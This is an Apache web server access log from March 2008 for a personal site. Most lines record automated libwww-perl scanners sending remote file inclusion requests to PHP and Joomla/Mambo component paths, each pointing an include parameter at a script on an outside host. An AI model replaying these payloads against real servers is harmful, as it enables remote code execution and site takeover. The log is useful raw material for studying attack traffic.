77.245.149.70 - - [27/Mar/2008:10:06:36 -0700] "GET /logs/scanhttp://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.140.116 - - [27/Mar/2008:10:06:37 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.140.116 - - [27/Mar/2008:10:06:37 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:07:17 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:10:07:17 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.thehogbitch.com/modules/contr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:07:17 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:07:17 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:07:23 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:07:24 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:07:24 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:10:07:24 -0700] "GET /logs/access_080127.log/scanhttp://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:07:25 -0700] "GET /logs/access_080127.log/scanhttp://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:10:07:33 -0700] "GET /logs/access_080223.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/peler88/31377albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:07:40 -0700] "GET /logs/access_080127.log/scanhttp://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:10:08:01 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:10:08:01 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:10:08:01 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.92.140.116 - - [27/Mar/2008:10:08:08 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.140.116 - - [27/Mar/2008:10:08:31 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.149.108.250 - - [27/Mar/2008:10:08:37 -0700] "GET /logs/access_080124.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.149.108.250 - - [27/Mar/2008:10:08:38 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.149.108.250 - - [27/Mar/2008:10:08:38 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:10:08:38 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://h1.ripway.com/peler88/31377albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:10:08:39 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://h1.ripway.com/peler88/31377albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.244.26.216 - - [27/Mar/2008:10:08:39 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:10:09:04 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:10:09:05 -0700] "GET /homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:10:09:06 -0700] "GET /logs/homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:10:09:10 -0700] "GET /logs/access_080216.log/homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.227.214.26 - - [27/Mar/2008:10:09:26 -0700] "GET /logs/access_080223.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [27/Mar/2008:10:09:28 -0700] "GET /logs/access_080125.log//page_tail.php?includePath=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [27/Mar/2008:10:09:28 -0700] "GET //page_tail.php?includePath=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [27/Mar/2008:10:09:29 -0700] "GET /logs//page_tail.php?includePath=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:10:09:29 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:10:09:30 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:10:09:30 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:10:09:32 -0700] "GET /logs/access_080312.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [27/Mar/2008:10:09:50 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [27/Mar/2008:10:09:51 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:09:55 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
41.201.227.168 - - [27/Mar/2008:10:10:00 -0700] "GET /logs/access_071212.log HTTP/1.1" 200 89527 "http://guide.opendns.com/controller.php?url=kadbest1.free.fr%2FMusic%2FGharbi%2FGharbi.html&ref=http%3A%2F%2Fwarrou.jeeran.com%2Fhip%2520hop.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
41.201.227.168 - - [27/Mar/2008:10:10:04 -0700] "GET /logs/access_071212.log HTTP/1.1" 206 89527 "http://www.dmulk.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:10:10:54 -0700] "GET /logs/access_080225.log/index.php?body=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:10:11:03 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:10:11:03 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:10:11:04 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:10:13:17 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.88.24.0 - - [27/Mar/2008:10:15:01 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.88.24.0 - - [27/Mar/2008:10:15:02 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.114.97.99 - - [27/Mar/2008:10:16:02 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.114.97.99 - - [27/Mar/2008:10:16:03 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.114.97.99 - - [27/Mar/2008:10:16:03 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.88.24.0 - - [27/Mar/2008:10:16:07 -0700] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:10:18:03 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:10:18:04 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [27/Mar/2008:10:18:40 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [27/Mar/2008:10:18:41 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [27/Mar/2008:10:18:41 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:10:19:13 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:10:19:13 -0700] "GET //main.php?sayfa=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:10:19:14 -0700] "GET /logs//main.php?sayfa=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:10:19:19 -0700] "GET /logs/access_080207.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.18.253 - - [27/Mar/2008:10:19:52 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.105 - - [27/Mar/2008:10:19:53 -0700] "GET /?S=D HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:10:20:30 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:10:21:11 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:10:21:11 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:10:21:12 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [27/Mar/2008:10:22:08 -0700] "GET /index.php?page=http://www.fundsites5.com/12all/admin/attach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.38.4.3 - - [27/Mar/2008:10:22:12 -0700] "GET /logs/index.php?page=http://www.fundsites5.com/12all/admin/attach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
89.111.176.28 - - [27/Mar/2008:10:23:08 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - - [27/Mar/2008:10:23:17 -0700] "GET /bikes/CreSTOC07 HTTP/1.1" 301 100 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.dmulk.com"
68.8.232.250 - - [27/Mar/2008:10:23:18 -0700] "GET /bikes/CreSTOC07/ HTTP/1.1" 200 15296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.dmulk.com"
72.29.73.171 - - [27/Mar/2008:10:23:22 -0700] "GET /logs/access_080215.log//mcf.php?content=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.73.171 - - [27/Mar/2008:10:23:22 -0700] "GET //mcf.php?content=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.73.171 - - [27/Mar/2008:10:23:22 -0700] "GET /logs//mcf.php?content=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:10:23:33 -0700] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.8.232.250 - - [27/Mar/2008:10:23:36 -0700] "GET /bikes/CreSTOC07/CreSTOC2007009.jpg HTTP/1.1" 200 4302837 "http://www.dmulk.com/bikes/CreSTOC07/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.dmulk.com"
76.88.24.0 - - [27/Mar/2008:10:23:50 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:10:24:06 -0700] "GET /logs/access_080131.log//main.php?sayfa=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [27/Mar/2008:10:24:16 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:10:24:42 -0700] "GET /logs/access_080216.log/main.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:10:24:43 -0700] "GET /main.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:10:24:43 -0700] "GET /logs/main.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.225.50 - - [27/Mar/2008:10:25:38 -0700] "GET /logs/access_080215.log///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.225.50 - - [27/Mar/2008:10:25:38 -0700] "GET /logs/access_080215.log///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.225.50 - - [27/Mar/2008:10:25:39 -0700] "GET ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.225.50 - - [27/Mar/2008:10:25:39 -0700] "GET ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.225.50 - - [27/Mar/2008:10:25:39 -0700] "GET /logs///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.225.50 - - [27/Mar/2008:10:25:39 -0700] "GET /logs///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.4.234.2 - - [27/Mar/2008:10:25:40 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:10:26:05 -0700] "GET //main.php?sayfa=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.4.234.2 - - [27/Mar/2008:10:26:46 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
202.4.234.2 - - [27/Mar/2008:10:26:47 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
202.4.234.2 - - [27/Mar/2008:10:26:47 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
217.114.97.99 - - [27/Mar/2008:10:27:09 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:10:27:16 -0700] "GET /logs/access_080201.log//index.php?option=com_joomlalib=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:10:27:17 -0700] "GET //index.php?option=com_joomlalib=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:10:27:17 -0700] "GET /logs//index.php?option=com_joomlalib=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:10:27:17 -0700] "GET /logs/access_080201.log//index.php?option=com_joomlalib=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:10:27:18 -0700] "GET //index.php?option=com_joomlalib=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:10:27:18 -0700] "GET /logs//index.php?option=com_joomlalib=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.17.159 - - [27/Mar/2008:10:27:31 -0700] "GET /logs/access_080118.log HTTP/1.0" 200 561818 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.149.108.250 - - [27/Mar/2008:10:28:21 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.4.234.2 - - [27/Mar/2008:10:29:21 -0700] "GET /logs/access_080215.log/akocomments.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:10:30:04 -0700] "GET /logs/access_080118.log//index.php?option=com_joomlalib=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:10:30:05 -0700] "GET //index.php?option=com_joomlalib=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:10:30:05 -0700] "GET /logs//index.php?option=com_joomlalib=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:10:30:13 -0700] "GET /logs/access_080118.log//index.php?option=com_joomlalib=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:10:30:13 -0700] "GET //index.php?option=com_joomlalib=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:10:30:13 -0700] "GET /logs//index.php?option=com_joomlalib=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
